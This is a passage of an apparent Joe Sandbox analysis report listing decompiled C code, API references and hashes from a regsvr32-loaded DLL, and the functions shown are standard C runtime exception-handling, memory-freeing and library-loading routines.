    								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
    									goto L66;
    								} else {
    									if( *((intOrPtr*)(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
    										L23:
    										_t300 = _v8;
    										_t279 = _v12;
    										L24:
    										_v52 = _t305;
    										_v48 = 0;
    										__eflags =  *_t274 - 0xe06d7363;
    										if( *_t274 != 0xe06d7363) {
    											L56:
    											__eflags = _t305[3];
    											if(_t305[3] <= 0) {
    												goto L59;
    											} else {
    												__eflags = _a24;
    												if(_a24 != 0) {
    													goto L66;
    												} else {
    													_push(_a32);
    													_push(_a28);
    													_push(_t279);
    													_push(_t305);
    													_push(_a16);
    													_push(_t300);
    													_push(_a8);
    													_push(_t274);
    													L67();
    													_t335 = _t335 + 0x20;
    													goto L59;
    												}
    											}
    										} else {
    											__eflags = _t274[0x10] - 3;
    											if(_t274[0x10] != 3) {
    												goto L56;
    											} else {
    												__eflags = _t274[0x14] - 0x19930520;
    												if(_t274[0x14] == 0x19930520) {
    													L29:
    													_t319 = _a32;
    													__eflags = _t305[3];
    													if(_t305[3] > 0) {
    														_push(_a28);
    														E6E9EA578(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
    														_t300 = _v64;
    														_t335 = _t335 + 0x18;
    														_t250 = _v68;
    														_v44 = _t250;
    														_v16 = _t300;
    														__eflags = _t300 - _v56;
    														if(_t300 < _v56) {
    															_t294 = _t300 * 0x14;
    															__eflags = _t294;
    															_v32 = _t294;
    															do {
    																_t295 = 5;
    																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
    																_t335 = _t335 + 0xc;
    																__eflags = _v104 - _t253;
    																if(_v104 <= _t253) {
    																	__eflags = _t253 - _v100;
    																	if(_t253 <= _v100) {
    																		_t298 = 0;
    																		_v20 = 0;
    																		__eflags = _v92;
    																		if(_v92 != 0) {
    																			_t255 =  *(_t274[0x1c] + 0xc);
    																			_t303 =  *_t255;
    																			_t256 =  &(_t255[1]);
    																			__eflags = _t256;
    																			_v36 = _t256;
    																			_t257 = _v88;
    																			_v40 = _t303;
    																			_v24 = _t257;
    																			do {
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				_t318 = _v36;
    																				_t330 = _t303;
    																				__eflags = _t330;
    																				if(_t330 <= 0) {
    																					goto L40;
    																				} else {
    																					while(1) {
    																						_push(_t274[0x1c]);
    																						_t258 =  &_v84;
    																						_push( *_t318);
    																						_push(_t258);
    																						L86();
    																						_t335 = _t335 + 0xc;
    																						__eflags = _t258;
    																						if(_t258 != 0) {
    																							break;
    																						}
    																						_t330 = _t330 - 1;
    																						_t318 = _t318 + 4;
    																						__eflags = _t330;
    																						if(_t330 > 0) {
    																							continue;
    																						} else {
    																							_t298 = _v20;
    																							_t257 = _v24;
    																							_t303 = _v40;
    																							goto L40;
    																						}
    																						goto L43;
    																					}
    																					_push(_a24);
    																					_push(_v28);
    																					E6E9EB04B(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
    																					_t335 = _t335 + 0x30;
    																				}
    																				L43:
    																				_t300 = _v16;
    																				goto L44;
    																				L40:
    																				_t298 = _t298 + 1;
    																				_t257 = _t257 + 0x10;
    																				_v20 = _t298;
    																				_v24 = _t257;
    																				__eflags = _t298 - _v92;
    																			} while (_t298 != _v92);
    																			goto L43;
    																		}
    																	}
    																}
    																L44:
    																_t300 = _t300 + 1;
    																_t250 = _v44;
    																_t294 = _v32 + 0x14;
    																_v16 = _t300;
    																_v32 = _t294;
    																__eflags = _t300 - _v56;
    															} while (_t300 < _v56);
    															_t305 = _a20;
    															_t319 = _a32;
    														}
    													}
    													__eflags = _a24;
    													if(__eflags != 0) {
    														_push(1);
    														E6E9EAB2E(_t274, _t305, _t319, __eflags);
    														_t279 = _t274;
    													}
    													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
    													if(( *_t305 & 0x1fffffff) < 0x19930521) {
    														L59:
    														_t225 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
    														__eflags =  *(_t225 + 0x1c);
    														if( *(_t225 + 0x1c) != 0) {
    															goto L66;
    														} else {
    															goto L60;
    														}
    													} else {
    														__eflags = _t305[7];
    														if(_t305[7] != 0) {
    															L52:
    															_t229 = _t305[8] >> 2;
    															__eflags = _t229 & 0x00000001;
    															if((_t229 & 0x00000001) == 0) {
    																_push(_t305[7]);
    																_t230 = E6E9EBADA(_t274, _t305, _t319, _t274);
    																_pop(_t279);
    																__eflags = _t230;
    																if(_t230 == 0) {
    																	goto L63;
    																} else {
    																	goto L59;
    																}
    															} else {
    																 *(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
    																_t238 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
    																_t290 = _v8;
    																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
    																goto L61;
    															}
    														} else {
    															_t245 = _t305[8] >> 2;
    															__eflags = _t245 & 0x00000001;
    															if((_t245 & 0x00000001) == 0) {
    																goto L59;
    															} else {
    																__eflags = _a28;
    																if(_a28 != 0) {
    																	goto L59;
    																} else {
    																	goto L52;
    																}
    															}
    														}
    													}
    												} else {
    													__eflags = _t274[0x14] - 0x19930521;
    													if(_t274[0x14] == 0x19930521) {
    														goto L29;
    													} else {
    														__eflags = _t274[0x14] - 0x19930522;
    														if(_t274[0x14] != 0x19930522) {
    															goto L56;
    														} else {
    															goto L29;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_v16 =  *((intOrPtr*)(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c));
    										_t268 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
    										_push(_v16);
    										 *(_t268 + 0x1c) = _t319;
    										_t269 = E6E9EBADA(_t274, _t305, _t319, _t274);
    										_pop(_t290);
    										if(_t269 != 0) {
    											goto L23;
    										} else {
    											_t305 = _v16;
    											_t356 =  *_t305 - _t319;
    											if( *_t305 <= _t319) {
    												L61:
    												E6E9ED3B8(_t274, _t290, _t300, _t305, _t319, __eflags);
    											} else {
    												while(1) {
    													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
    													if(E6E9EB76E( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6e9fc920) != 0) {
    														goto L62;
    													}
    													_t319 = _t319 + 0x10;
    													_t273 = _v20 + 1;
    													_v20 = _t273;
    													_t356 = _t273 -  *_t305;
    													if(_t273 >=  *_t305) {
    														goto L61;
    													} else {
    														continue;
    													}
    													goto L62;
    												}
    											}
    											L62:
    											_push(1);
    											_push(_t274);
    											E6E9EAB2E(_t274, _t305, _t319, __eflags);
    											_t279 =  &_v64;
    											E6E9EB756( &_v64);
    											E6E9EA50C( &_v64, 0x6e9fa7ac);
    											L63:
    											 *(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
    											_t232 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
    											_t279 = _v8;
    											 *(_t232 + 0x14) = _v8;
    											__eflags = _t319;
    											if(_t319 == 0) {
    												_t319 = _a8;
    											}
    											E6E9EA76B(_t279, _t319, _t274);
    											E6E9EB9DA(_a8, _a16, _t305);
    											_t235 = E6E9EBB97(_t305);
    											_t335 = _t335 + 0x10;
    											_push(_t235);
    											E6E9EB951(_t274, _t279, _t300, _t305, _t319, __eflags);
    											goto L66;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}
    0x00000000
    0x6e9eb30d
    0x6e9eb30d
    0x6e9eb310
    0x6e9eb313
    0x00000000
    0x6e9eb313
    0x00000000
    0x6e9eb30b
    0x6e9eb327
    0x6e9eb32d
    0x6e9eb34a
    0x6e9eb34f
    0x6e9eb34f
    0x6e9eb352
    0x6e9eb352
    0x00000000
    0x6e9eb316
    0x6e9eb316
    0x6e9eb317
    0x6e9eb31a
    0x6e9eb31d
    0x6e9eb320
    0x6e9eb320
    0x00000000
    0x6e9eb325
    0x6e9eb2c1
    0x6e9eb2b3
    0x6e9eb355
    0x6e9eb358
    0x6e9eb359
    0x6e9eb35c
    0x6e9eb35f
    0x6e9eb362
    0x6e9eb365
    0x6e9eb365
    0x6e9eb36e
    0x6e9eb371
    0x6e9eb371
    0x6e9eb289
    0x6e9eb374
    0x6e9eb378
    0x6e9eb37a
    0x6e9eb37d
    0x6e9eb383
    0x6e9eb383
    0x6e9eb38b
    0x6e9eb390
    0x6e9eb3fe
    0x6e9eb3fe
    0x6e9eb403
    0x6e9eb407
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e9eb392
    0x6e9eb392
    0x6e9eb396
    0x6e9eb3a8
    0x6e9eb3ab
    0x6e9eb3ae
    0x6e9eb3b0
    0x6e9eb3c7
    0x6e9eb3cb
    0x6e9eb3d1
    0x6e9eb3d2
    0x6e9eb3d4
    0x00000000
    0x6e9eb3d6
    0x00000000
    0x6e9eb3d6
    0x6e9eb3b2
    0x6e9eb3b7
    0x6e9eb3ba
    0x6e9eb3bf
    0x6e9eb3c2
    0x00000000
    0x6e9eb3c2
    0x6e9eb398
    0x6e9eb39b
    0x6e9eb39e
    0x6e9eb3a0
    0x00000000
    0x6e9eb3a2
    0x6e9eb3a2
    0x6e9eb3a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e9eb3a6
    0x6e9eb3a0
    0x6e9eb396
    0x6e9eb240
    0x6e9eb240
    0x6e9eb247
    0x00000000
    0x6e9eb249
    0x6e9eb249
    0x6e9eb250
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e9eb250
    0x6e9eb247
    0x6e9eb23e
    0x6e9eb231
    0x6e9eb1b1
    0x6e9eb1b9
    0x6e9eb1bc
    0x6e9eb1c1
    0x6e9eb1c5
    0x6e9eb1c8
    0x6e9eb1ce
    0x6e9eb1d1
    0x00000000
    0x6e9eb1d3
    0x6e9eb1d3
    0x6e9eb1d6
    0x6e9eb1d8
    0x6e9eb40e
    0x6e9eb40e
    0x00000000
    0x6e9eb1de
    0x6e9eb1e6
    0x6e9eb1f1
    0x00000000
    0x00000000
    0x6e9eb1fa
    0x6e9eb1fd
    0x6e9eb1fe
    0x6e9eb201
    0x6e9eb203
    0x00000000
    0x6e9eb209
    0x00000000
    0x6e9eb209
    0x00000000
    0x6e9eb203
    0x6e9eb1de
    0x6e9eb413
    0x6e9eb413
    0x6e9eb415
    0x6e9eb416
    0x6e9eb41d
    0x6e9eb420
    0x6e9eb42e
    0x6e9eb433
    0x6e9eb438
    0x6e9eb43b
    0x6e9eb440
    0x6e9eb443
    0x6e9eb446
    0x6e9eb448
    0x6e9eb44a
    0x6e9eb44a
    0x6e9eb44f
    0x6e9eb45b
    0x6e9eb461
    0x6e9eb466
    0x6e9eb469
    0x6e9eb46a
    0x00000000
    0x6e9eb46a
    0x6e9eb1d1
    0x6e9eb1af
    0x6e9eb16f
    0x6e9eb150
    0x6e9eb142
    0x6e9eb10e

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EB1C8
    • type_info::operator==.LIBVCRUNTIME ref: 6E9EB1EA
    • ___TypeMatch.LIBVCRUNTIME ref: 6E9EB2F9
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EB3CB
    • _UnwindNestedFrames.LIBCMT ref: 6E9EB44F
    • CallUnexpected.LIBVCRUNTIME ref: 6E9EB46A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 2123188842-393685449
    • Opcode ID: fd0d6bd0518f12673e78f40b51eb64be5ca8fbc08558b3d15fd3067cc87f7f61
    • Instruction ID: 1c9ab93d6c74720c62ae2c054160482ef6b85860a53f79526490c2bb298f8b51
    • Opcode Fuzzy Hash: fd0d6bd0518f12673e78f40b51eb64be5ca8fbc08558b3d15fd3067cc87f7f61
    • Instruction Fuzzy Hash: FDB17A31801309EFCF26CFE4D880A9EB7B9BF54314F00455AEA146BA29E331DA51CF91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E6E9ED878(void* __ebx, void* __edi, void* __esi, char _a4) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* __ebp;
    				char _t55;
    				char _t61;
    				void* _t67;
    				intOrPtr _t68;
    				void* _t72;
    				void* _t73;
    
    				_t73 = __esi;
    				_t72 = __edi;
    				_t67 = __ebx;
    				_t36 = _a4;
    				_t68 =  *_a4;
    				_t77 = _t68 - 0x6e9f5f50;
    				if(_t68 != 0x6e9f5f50) {
    					E6E9EDC0E(_t68);
    					_t36 = _a4;
    				}
    				E6E9EDC0E( *((intOrPtr*)(_t36 + 0x3c)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x30)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x34)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x38)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x28)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x2c)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x40)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x44)));
    				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x360)));
    				_v16 =  &_a4;
    				_t55 = 5;
    				_v12 = _t55;
    				_v20 = _t55;
    				_push( &_v12);
    				_push( &_v16);
    				_push( &_v20);
    				E6E9ED6A4(_t67, _t72, _t73, _t77);
    				_v16 =  &_a4;
    				_t61 = 4;
    				_v20 = _t61;
    				_v12 = _t61;
    				_push( &_v20);
    				_push( &_v16);
    				_push( &_v12);
    				return E6E9ED70F(_t67, _t72, _t73, _t77);
    			}















    APIs
    • _free.LIBCMT ref: 6E9ED88E
      • Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
      • Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36
    • _free.LIBCMT ref: 6E9ED89A
    • _free.LIBCMT ref: 6E9ED8A5
    • _free.LIBCMT ref: 6E9ED8B0
    • _free.LIBCMT ref: 6E9ED8BB
    • _free.LIBCMT ref: 6E9ED8C6
    • _free.LIBCMT ref: 6E9ED8D1
    • _free.LIBCMT ref: 6E9ED8DC
    • _free.LIBCMT ref: 6E9ED8E7
    • _free.LIBCMT ref: 6E9ED8F5
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ae1c0220f0767e3020f3777b024cfa29791ba55b616ffd8e6930f3f11dcb20ce
    • Instruction ID: e3336625a2388467a3d9b77ff9fa68dbd612d5be499f2871ef8d2391a26da0d7
    • Opcode Fuzzy Hash: ae1c0220f0767e3020f3777b024cfa29791ba55b616ffd8e6930f3f11dcb20ce
    • Instruction Fuzzy Hash: A5219776940108EFCB52DFE4C881DDE7BBDBF98244F0145A6E6199B660DB71EA44CF80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E6E9EA9D0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v32;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t68;
    				signed int _t75;
    				intOrPtr _t76;
    				void* _t77;
    				signed int _t78;
    				intOrPtr _t80;
    				signed int _t83;
    				signed int _t87;
    				intOrPtr* _t90;
    				intOrPtr _t91;
    				signed int _t94;
    				char _t96;
    				signed int _t102;
    				signed int _t103;
    				signed int _t110;
    				void* _t111;
    				intOrPtr _t112;
    				signed int _t113;
    				signed int _t115;
    				void* _t116;
    				void* _t117;
    				void* _t123;
    
    				_t107 = __edx;
    				_t90 = _a4;
    				_v5 = 0;
    				_v16 = 1;
    				 *_t90 = E6E9F4630(__ecx,  *_t90);
    				_t91 = _a8;
    				_t6 = _t91 + 0x10; // 0x11
    				_t113 = _t6;
    				_push(_t113);
    				_v20 = _t113;
    				_v12 =  *(_t91 + 8) ^  *0x6e9fc024;
    				E6E9EA990(_t91, __edx, _t111, _t113,  *(_t91 + 8) ^  *0x6e9fc024);
    				E6E9EBBFC(_a12);
    				_t68 = _a4;
    				_t117 = _t116 + 0x10;
    				_t112 =  *((intOrPtr*)(_t91 + 0xc));
    				if(( *(_t68 + 4) & 0x00000066) != 0) {
    					__eflags = _t112 - 0xfffffffe;
    					if(_t112 != 0xfffffffe) {
    						_t107 = 0xfffffffe;
    						E6E9EBDF0(_t91, 0xfffffffe, _t113, 0x6e9fc024);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t68;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
    					if(_t112 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t94 = _v12;
    							_t75 = _t112 + (_t112 + 2) * 2;
    							_t91 =  *((intOrPtr*)(_t94 + _t75 * 4));
    							_t76 = _t94 + _t75 * 4;
    							_t95 =  *((intOrPtr*)(_t76 + 4));
    							_v24 = _t76;
    							if( *((intOrPtr*)(_t76 + 4)) == 0) {
    								_t96 = _v5;
    								goto L7;
    							} else {
    								_t107 = _t113;
    								_t77 = E6E9EBD90(_t95, _t113);
    								_t96 = 1;
    								_v5 = 1;
    								_t123 = _t77;
    								if(_t123 < 0) {
    									_v16 = 0;
    									L13:
    									_push(_t113);
    									E6E9EA990(_t91, _t107, _t112, _t113, _v12);
    									goto L14;
    								} else {
    									if(_t123 > 0) {
    										_t78 = _a4;
    										__eflags =  *_t78 - 0xe06d7363;
    										if( *_t78 == 0xe06d7363) {
    											__eflags =  *0x6e9f5474;
    											if(__eflags != 0) {
    												_t87 = E6E9F44D0(__eflags, 0x6e9f5474);
    												_t117 = _t117 + 4;
    												__eflags = _t87;
    												if(_t87 != 0) {
    													_t115 =  *0x6e9f5474; // 0x6e9eab2e
    													 *0x6e9f51b8(_a4, 1);
    													 *_t115();
    													_t113 = _v20;
    													_t117 = _t117 + 8;
    												}
    												_t78 = _a4;
    											}
    										}
    										_t108 = _t78;
    										E6E9EBDD0(_t78, _a8, _t78);
    										_t80 = _a8;
    										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t112;
    										if( *((intOrPtr*)(_t80 + 0xc)) != _t112) {
    											_t108 = _t112;
    											E6E9EBDF0(_t80, _t112, _t113, 0x6e9fc024);
    											_t80 = _a8;
    										}
    										_push(_t113);
    										 *((intOrPtr*)(_t80 + 0xc)) = _t91;
    										E6E9EA990(_t91, _t108, _t112, _t113, _v12);
    										E6E9EBDB0();
    										asm("int3");
    										_push(8);
    										_push(0x6e9fa6a8);
    										E6E9E9960(_t91, _t112, _t113);
    										_t83 = _a4;
    										__eflags = _t83;
    										if(_t83 != 0) {
    											__eflags =  *_t83 - 0xe06d7363;
    											if( *_t83 == 0xe06d7363) {
    												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
    												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
    													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
    													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
    														L29:
    														_t102 =  *(_t83 + 0x1c);
    														__eflags = _t102;
    														if(_t102 != 0) {
    															_t110 =  *(_t102 + 4);
    															__eflags = _t110;
    															if(_t110 == 0) {
    																__eflags =  *_t102 & 0x00000010;
    																if(( *_t102 & 0x00000010) != 0) {
    																	_t83 =  *(_t83 + 0x18);
    																	_t103 =  *_t83;
    																	__eflags = _t103;
    																	if(_t103 != 0) {
    																		 *0x6e9f51b8(_t103);
    																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
    																	}
    																}
    															} else {
    																_t54 =  &_v8;
    																 *_t54 = _v8 & 0x00000000;
    																__eflags =  *_t54;
    																_t83 = E6E9EABCF( *(_t83 + 0x18), _t110);
    																_v8 = 0xfffffffe;
    															}
    														}
    													} else {
    														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
    														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
    															goto L29;
    														} else {
    															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
    															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
    																goto L29;
    															}
    														}
    													}
    												}
    											}
    										}
    										 *[fs:0x0] = _v20;
    										return _t83;
    									} else {
    										goto L7;
    									}
    								}
    							}
    							goto L37;
    							L7:
    							_t112 = _t91;
    						} while (_t91 != 0xfffffffe);
    						if(_t96 != 0) {
    							goto L13;
    						}
    						goto L14;
    					}
    				}
    				L37:
    			}






































    APIs
    • _ValidateLocalCookies.LIBCMT ref: 6E9EAA07
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E9EAA0F
    • _ValidateLocalCookies.LIBCMT ref: 6E9EAA98
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E9EAAC3
    • _ValidateLocalCookies.LIBCMT ref: 6E9EAB18
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: b6200cc9d2cdfc8b1e602c92f1a4893793c4a1b0a9e492fb3d485aec22a716ff
    • Instruction ID: 34952f5d1864a5f15eddfba35a8d617eb22b0908dcfee20b1cb9ac66c0a63214
    • Opcode Fuzzy Hash: b6200cc9d2cdfc8b1e602c92f1a4893793c4a1b0a9e492fb3d485aec22a716ff
    • Instruction Fuzzy Hash: 6D41B330A00309AFCF02CFA9C980ADE7BFAAF85318F008555EA156B765D771DA42CF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EDCF3(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				void** _t12;
    				void* _t16;
    				void* _t18;
    				signed int _t22;
    				WCHAR* _t23;
    				void** _t26;
    				signed int* _t29;
    				void* _t32;
    				void* _t34;
    
    				_t29 = _a4;
    				while(_t29 != _a8) {
    					_t22 =  *_t29;
    					_t12 = 0x6e9fd560 + _t22 * 4;
    					_t32 =  *_t12;
    					_v8 = _t12;
    					if(_t32 == 0) {
    						_t23 =  *(0x6e9f6200 + _t22 * 4);
    						_t32 = LoadLibraryExW(_t23, 0, 0x800);
    						if(_t32 != 0) {
    							L12:
    							_t26 = _v8;
    							 *_t26 = _t32;
    							if( *_t26 != 0) {
    								FreeLibrary(_t32);
    							}
    							L14:
    							if(_t32 != 0) {
    								_t16 = _t32;
    								L18:
    								return _t16;
    							}
    							L15:
    							_t29 =  &(_t29[1]);
    							continue;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L9:
    							_t32 = 0;
    							L10:
    							if(_t32 != 0) {
    								goto L12;
    							}
    							 *_v8 = _t18 | 0xffffffff;
    							goto L15;
    						}
    						_t18 = E6E9ED618(_t23, L"api-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = E6E9ED618(_t23, L"ext-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = LoadLibraryExW(_t23, _t32, _t32);
    						_t32 = _t18;
    						goto L10;
    					}
    					if(_t32 == 0xffffffff) {
    						goto L15;
    					}
    					goto L14;
    				}
    				_t16 = 0;
    				goto L18;
    			}














    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: ca010af1f97b6da24e20a4debaf1ce9859ef3f6f78de75df198fff31c1f9b9c6
    • Instruction ID: 457525da2d844ee9e9c43fb421d24fba73abeb36415b091f1d94c4bca980451e
    • Opcode Fuzzy Hash: ca010af1f97b6da24e20a4debaf1ce9859ef3f6f78de75df198fff31c1f9b9c6
    • Instruction Fuzzy Hash: 1321A171A45721ABDB538AB59C44B4A3B6C9FC2764F110550EA15ABF80D720ED40CEE0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9F19AC(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E6E9F1974(_t45, 7);
    					E6E9F1974(_t45 + 0x1c, 7);
    					E6E9F1974(_t45 + 0x38, 0xc);
    					E6E9F1974(_t45 + 0x68, 0xc);
    					E6E9F1974(_t45 + 0x98, 2);
    					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa0)));
    					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa4)));
    					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa8)));
    					E6E9F1974(_t45 + 0xb4, 7);
    					E6E9F1974(_t45 + 0xd0, 7);
    					E6E9F1974(_t45 + 0xec, 0xc);
    					E6E9F1974(_t45 + 0x11c, 0xc);
    					E6E9F1974(_t45 + 0x14c, 2);
    					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x154)));
    					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x158)));
    					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x15c)));
    					return E6E9EDC0E( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}





    APIs
      • Part of subcall function 6E9F1974: _free.LIBCMT ref: 6E9F1999
    • _free.LIBCMT ref: 6E9F19FA
      • Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
      • Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36
    • _free.LIBCMT ref: 6E9F1A05
    • _free.LIBCMT ref: 6E9F1A10
    • _free.LIBCMT ref: 6E9F1A64
    • _free.LIBCMT ref: 6E9F1A6F
    • _free.LIBCMT ref: 6E9F1A7A
    • _free.LIBCMT ref: 6E9F1A85
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
